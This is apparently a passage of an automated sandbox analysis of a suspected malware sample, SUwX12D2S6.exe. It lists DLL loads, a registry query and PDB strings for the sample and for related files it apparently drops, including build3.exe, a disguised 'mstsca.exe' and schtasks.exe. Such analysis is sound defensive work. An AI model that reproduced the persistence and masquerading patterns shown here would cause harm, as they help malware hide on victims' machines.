Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SUwX12D2S6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Q source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\ source: SUwX12D2S6.exe, 00000004.00000003.2174722676.000000000356A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.bgzqat source: SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2169822173.0000000003161000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159585768.0000000003163000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157654247.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2176334680.000000000316C000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157384871.0000000003146000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\C source: SUwX12D2S6.exe, 00000004.00000003.2210484839.0000000003417000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202211710.00000000033FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226957493.0000000003962000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\we\g source: SUwX12D2S6.exe, 00000004.00000003.2237119019.0000000003514000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2239471258.00000000034EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_m source: SUwX12D2S6.exe, 00000004.00000003.2170576871.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184538505.00000000033F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2236436289.0000000003893000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\A source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226957493.0000000003962000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218553034.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2236436289.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\celefeboxu.pdb source: SUwX12D2S6.exe
Source: Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000002.1785156949.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000000.1781524100.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1783808645.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\l\\ source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\State\ source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174722676.000000000356A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159634085.0000000003564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000A.00000000.1805138719.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000A.00000002.1913333134.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 00000010.00000000.1911812806.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000013.00000000.1918990852.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000013.00000002.2018872471.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000014.00000000.2017466458.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000002.2348608889.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000000.2275814306.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2347560708.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000002.2973317219.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.2865813530.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.2972376587.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000002.3583754315.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3466010192.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.3582957712.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000002.4129370107.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000000.4066108806.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\*z source: SUwX12D2S6.exe, 00000004.00000003.2158386481.0000000003410000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157238464.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Temp\( source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\q source: SUwX12D2S6.exe, 00000004.00000003.1882036014.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1843805332.0000000003148000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cM source: SUwX12D2S6.exe, 00000004.00000003.2202710386.000000000382E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\SystemAppData\Q source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2202710386.000000000382E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ion source: SUwX12D2S6.exe, 00000004.00000003.2201021660.000000000356D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203390038.000000000357A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202256063.000000000356D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2210964209.000000000357E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209889977.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2208481995.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SUwX12D2S6.exe, 00000004.00000003.2225038196.0000000003192000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216776414.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216475290.0000000003183000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Appli source: SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
